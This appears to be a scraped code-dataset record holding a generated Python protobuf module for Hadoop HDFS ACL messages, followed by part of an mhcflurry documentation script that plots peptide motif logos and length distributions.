_ACLENTRYPROTO.fields_by_name['scope'].enum_type = _ACLENTRYPROTO_ACLENTRYSCOPEPROTO
_ACLENTRYPROTO.fields_by_name['permissions'].enum_type = _ACLENTRYPROTO_FSACTIONPROTO
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_ACLENTRYTYPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_FSACTIONPROTO.containing_type = _ACLENTRYPROTO;
_ACLSTATUSPROTO.fields_by_name['entries'].message_type = _ACLENTRYPROTO
_ACLSTATUSPROTO.fields_by_name['permission'].message_type = hdfs_pb2._FSPERMISSIONPROTO
_MODIFYACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_REMOVEACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_SETACLREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_GETACLSTATUSRESPONSEPROTO.fields_by_name['result'].message_type = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['AclEntryProto'] = _ACLENTRYPROTO
DESCRIPTOR.message_types_by_name['AclStatusProto'] = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesRequestProto'] = _MODIFYACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesResponseProto'] = _MODIFYACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclRequestProto'] = _REMOVEACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclResponseProto'] = _REMOVEACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesRequestProto'] = _REMOVEACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesResponseProto'] = _REMOVEACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclRequestProto'] = _REMOVEDEFAULTACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclResponseProto'] = _REMOVEDEFAULTACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['SetAclRequestProto'] = _SETACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['SetAclResponseProto'] = _SETACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusRequestProto'] = _GETACLSTATUSREQUESTPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusResponseProto'] = _GETACLSTATUSRESPONSEPROTO
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), '\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\240\001\001')
# @@protoc_insertion_point(module_scope)
| 34.500756 | 2,158 | 0.75979 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: acl.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
import hdfs_pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='acl.proto',
package='hadoop.hdfs',
serialized_pb='\n\tacl.proto\x12\x0bhadoop.hdfs\x1a\nhdfs.proto\"\xc4\x03\n\rAclEntryProto\x12:\n\x04type\x18\x01 \x02(\x0e\x32,.hadoop.hdfs.AclEntryProto.AclEntryTypeProto\x12<\n\x05scope\x18\x02 \x02(\x0e\x32-.hadoop.hdfs.AclEntryProto.AclEntryScopeProto\x12=\n\x0bpermissions\x18\x03 \x02(\x0e\x32(.hadoop.hdfs.AclEntryProto.FsActionProto\x12\x0c\n\x04name\x18\x04 \x01(\t\"-\n\x12\x41\x63lEntryScopeProto\x12\n\n\x06\x41\x43\x43\x45SS\x10\x00\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x01\"=\n\x11\x41\x63lEntryTypeProto\x12\x08\n\x04USER\x10\x00\x12\t\n\x05GROUP\x10\x01\x12\x08\n\x04MASK\x10\x02\x12\t\n\x05OTHER\x10\x03\"~\n\rFsActionProto\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45XECUTE\x10\x01\x12\t\n\x05WRITE\x10\x02\x12\x11\n\rWRITE_EXECUTE\x10\x03\x12\x08\n\x04READ\x10\x04\x12\x10\n\x0cREAD_EXECUTE\x10\x05\x12\x0e\n\nREAD_WRITE\x10\x06\x12\x0c\n\x08PERM_ALL\x10\x07\"\x9f\x01\n\x0e\x41\x63lStatusProto\x12\r\n\x05owner\x18\x01 \x02(\t\x12\r\n\x05group\x18\x02 \x02(\t\x12\x0e\n\x06sticky\x18\x03 \x02(\x08\x12+\n\x07\x65ntries\x18\x04 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\x12\x32\n\npermission\x18\x05 \x01(\x0b\x32\x1e.hadoop.hdfs.FsPermissionProto\"X\n\x1cModifyAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dModifyAclEntriesResponseProto\"$\n\x15RemoveAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x18\n\x16RemoveAclResponseProto\"X\n\x1cRemoveAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dRemoveAclEntriesResponseProto\"+\n\x1cRemoveDefaultAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x1f\n\x1dRemoveDefaultAclResponseProto\"N\n\x12SetAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x15\n\x13SetAclResponseProto\"\'\n\x18GetAclStatusRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"H\n\x19GetAclStatusResponseProto\x12+\n\x06result\x18\x01 \x02(\x0b\x32\x1b.hadoop.hdfs.AclStatusProtoB5\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\xa0\x01\x01')
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryScopeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryScopeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ACCESS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=255,
serialized_end=300,
)
_ACLENTRYPROTO_ACLENTRYTYPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryTypeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='USER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MASK', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OTHER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=302,
serialized_end=363,
)
_ACLENTRYPROTO_FSACTIONPROTO = _descriptor.EnumDescriptor(
name='FsActionProto',
full_name='hadoop.hdfs.AclEntryProto.FsActionProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXECUTE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_EXECUTE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_EXECUTE', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_WRITE', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PERM_ALL', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=365,
serialized_end=491,
)
_ACLENTRYPROTO = _descriptor.Descriptor(
name='AclEntryProto',
full_name='hadoop.hdfs.AclEntryProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='hadoop.hdfs.AclEntryProto.type', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scope', full_name='hadoop.hdfs.AclEntryProto.scope', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permissions', full_name='hadoop.hdfs.AclEntryProto.permissions', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='hadoop.hdfs.AclEntryProto.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO,
_ACLENTRYPROTO_ACLENTRYTYPEPROTO,
_ACLENTRYPROTO_FSACTIONPROTO,
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=39,
serialized_end=491,
)
_ACLSTATUSPROTO = _descriptor.Descriptor(
name='AclStatusProto',
full_name='hadoop.hdfs.AclStatusProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='owner', full_name='hadoop.hdfs.AclStatusProto.owner', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group', full_name='hadoop.hdfs.AclStatusProto.group', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sticky', full_name='hadoop.hdfs.AclStatusProto.sticky', index=2,
number=3, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entries', full_name='hadoop.hdfs.AclStatusProto.entries', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permission', full_name='hadoop.hdfs.AclStatusProto.permission', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=494,
serialized_end=653,
)
_MODIFYACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesRequestProto',
full_name='hadoop.hdfs.ModifyAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=655,
serialized_end=743,
)
_MODIFYACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesResponseProto',
full_name='hadoop.hdfs.ModifyAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=745,
serialized_end=776,
)
_REMOVEACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclRequestProto',
full_name='hadoop.hdfs.RemoveAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=778,
serialized_end=814,
)
_REMOVEACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclResponseProto',
full_name='hadoop.hdfs.RemoveAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=816,
serialized_end=840,
)
_REMOVEACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesRequestProto',
full_name='hadoop.hdfs.RemoveAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=842,
serialized_end=930,
)
_REMOVEACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesResponseProto',
full_name='hadoop.hdfs.RemoveAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=932,
serialized_end=963,
)
_REMOVEDEFAULTACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclRequestProto',
full_name='hadoop.hdfs.RemoveDefaultAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveDefaultAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=965,
serialized_end=1008,
)
_REMOVEDEFAULTACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclResponseProto',
full_name='hadoop.hdfs.RemoveDefaultAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1010,
serialized_end=1041,
)
_SETACLREQUESTPROTO = _descriptor.Descriptor(
name='SetAclRequestProto',
full_name='hadoop.hdfs.SetAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.SetAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.SetAclRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1043,
serialized_end=1121,
)
_SETACLRESPONSEPROTO = _descriptor.Descriptor(
name='SetAclResponseProto',
full_name='hadoop.hdfs.SetAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1123,
serialized_end=1144,
)
_GETACLSTATUSREQUESTPROTO = _descriptor.Descriptor(
name='GetAclStatusRequestProto',
full_name='hadoop.hdfs.GetAclStatusRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.GetAclStatusRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1146,
serialized_end=1185,
)
_GETACLSTATUSRESPONSEPROTO = _descriptor.Descriptor(
name='GetAclStatusResponseProto',
full_name='hadoop.hdfs.GetAclStatusResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='result', full_name='hadoop.hdfs.GetAclStatusResponseProto.result', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1187,
serialized_end=1259,
)
_ACLENTRYPROTO.fields_by_name['type'].enum_type = _ACLENTRYPROTO_ACLENTRYTYPEPROTO
_ACLENTRYPROTO.fields_by_name['scope'].enum_type = _ACLENTRYPROTO_ACLENTRYSCOPEPROTO
_ACLENTRYPROTO.fields_by_name['permissions'].enum_type = _ACLENTRYPROTO_FSACTIONPROTO
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_ACLENTRYTYPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_FSACTIONPROTO.containing_type = _ACLENTRYPROTO;
_ACLSTATUSPROTO.fields_by_name['entries'].message_type = _ACLENTRYPROTO
_ACLSTATUSPROTO.fields_by_name['permission'].message_type = hdfs_pb2._FSPERMISSIONPROTO
_MODIFYACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_REMOVEACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_SETACLREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_GETACLSTATUSRESPONSEPROTO.fields_by_name['result'].message_type = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['AclEntryProto'] = _ACLENTRYPROTO
DESCRIPTOR.message_types_by_name['AclStatusProto'] = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesRequestProto'] = _MODIFYACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesResponseProto'] = _MODIFYACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclRequestProto'] = _REMOVEACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclResponseProto'] = _REMOVEACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesRequestProto'] = _REMOVEACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesResponseProto'] = _REMOVEACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclRequestProto'] = _REMOVEDEFAULTACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclResponseProto'] = _REMOVEDEFAULTACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['SetAclRequestProto'] = _SETACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['SetAclResponseProto'] = _SETACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusRequestProto'] = _GETACLSTATUSREQUESTPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusResponseProto'] = _GETACLSTATUSRESPONSEPROTO
class AclEntryProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _ACLENTRYPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.AclEntryProto)
class AclStatusProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _ACLSTATUSPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.AclStatusProto)
class ModifyAclEntriesRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _MODIFYACLENTRIESREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.ModifyAclEntriesRequestProto)
class ModifyAclEntriesResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _MODIFYACLENTRIESRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.ModifyAclEntriesResponseProto)
class RemoveAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclRequestProto)
class RemoveAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclResponseProto)
class RemoveAclEntriesRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLENTRIESREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclEntriesRequestProto)
class RemoveAclEntriesResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLENTRIESRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclEntriesResponseProto)
class RemoveDefaultAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEDEFAULTACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveDefaultAclRequestProto)
class RemoveDefaultAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEDEFAULTACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveDefaultAclResponseProto)
class SetAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _SETACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.SetAclRequestProto)
class SetAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _SETACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.SetAclResponseProto)
class GetAclStatusRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _GETACLSTATUSREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.GetAclStatusRequestProto)
class GetAclStatusResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _GETACLSTATUSRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.GetAclStatusResponseProto)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), '\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\240\001\001')
# @@protoc_insertion_point(module_scope)
| 0 | 2,885 | 322 |
af81ed36e1f1184d64fb2de2e30627cacf0e71cb | 8,288 | py | Python | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | 1 | 2020-01-01T23:06:01.000Z | 2020-01-01T23:06:01.000Z | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | null | null | null | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | null | null | null | """
Generate certain RST files used in documentation.
"""
from __future__ import print_function
import sys
import argparse
from collections import OrderedDict, defaultdict
import os
from os.path import join, exists
from os import mkdir
import pandas
import logomaker
from matplotlib import pyplot
from mhcflurry.downloads import get_path
from mhcflurry.amino_acid import COMMON_AMINO_ACIDS
AMINO_ACIDS = sorted(COMMON_AMINO_ACIDS)
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument(
"--class1-models-dir-with-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.with_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--class1-models-dir-no-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.no_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--logo-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for motifs",
)
parser.add_argument(
"--length-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for length distribution",
)
parser.add_argument(
"--length-distribution-lengths",
nargs="+",
default=[8, 9, 10, 11, 12, 13, 14, 15],
type=int,
help="Peptide lengths for length distribution plots",
)
parser.add_argument(
"--motif-lengths",
nargs="+",
default=[8, 9, 10, 11],
type=int,
help="Peptide lengths for motif plots",
)
parser.add_argument(
"--out-dir",
metavar="DIR",
required=True,
help="Directory to write RSTs and images to",
)
parser.add_argument(
"--max-alleles",
default=None,
type=int,
metavar="N",
help="Only use N alleles (for testing)",
)
if __name__ == "__main__":
go(sys.argv[1:])
| 30.470588 | 89 | 0.628016 | """
Generate certain RST files used in documentation.
"""
from __future__ import print_function
import sys
import argparse
from collections import OrderedDict, defaultdict
import os
from os.path import join, exists
from os import mkdir
import pandas
import logomaker
from matplotlib import pyplot
from mhcflurry.downloads import get_path
from mhcflurry.amino_acid import COMMON_AMINO_ACIDS
AMINO_ACIDS = sorted(COMMON_AMINO_ACIDS)
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument(
"--class1-models-dir-with-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.with_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--class1-models-dir-no-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.no_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--logo-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for motifs",
)
parser.add_argument(
"--length-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for length distribution",
)
parser.add_argument(
"--length-distribution-lengths",
nargs="+",
default=[8, 9, 10, 11, 12, 13, 14, 15],
type=int,
help="Peptide lengths for length distribution plots",
)
parser.add_argument(
"--motif-lengths",
nargs="+",
default=[8, 9, 10, 11],
type=int,
help="Peptide lengths for motif plots",
)
parser.add_argument(
"--out-dir",
metavar="DIR",
required=True,
help="Directory to write RSTs and images to",
)
parser.add_argument(
"--max-alleles",
default=None,
type=int,
metavar="N",
help="Only use N alleles (for testing)",
)
def model_info(models_dir):
length_distributions_df = pandas.read_csv(
join(models_dir, "length_distributions.csv.bz2"))
frequency_matrices_df = pandas.read_csv(
join(models_dir, "frequency_matrices.csv.bz2"))
train_data_df = pandas.read_csv(
join(models_dir, "train_data.csv.bz2"))
distribution = frequency_matrices_df.loc[
(frequency_matrices_df.cutoff_fraction == 1.0), AMINO_ACIDS
].mean(0)
normalized_frequency_matrices = frequency_matrices_df.copy()
normalized_frequency_matrices.loc[:, AMINO_ACIDS] = (
normalized_frequency_matrices[AMINO_ACIDS] / distribution)
observations_per_allele = (
train_data_df.groupby("allele").peptide.nunique().to_dict())
return {
'length_distributions': length_distributions_df,
'normalized_frequency_matrices': normalized_frequency_matrices,
'observations_per_allele': observations_per_allele,
}
def write_logo(
normalized_frequency_matrices,
allele,
lengths,
cutoff,
models_label,
out_dir):
fig = pyplot.figure(figsize=(8,10))
for (i, length) in enumerate(lengths):
ax = pyplot.subplot(len(lengths), 1, i + 1)
matrix = normalized_frequency_matrices.loc[
(normalized_frequency_matrices.allele == allele) &
(normalized_frequency_matrices.length == length) &
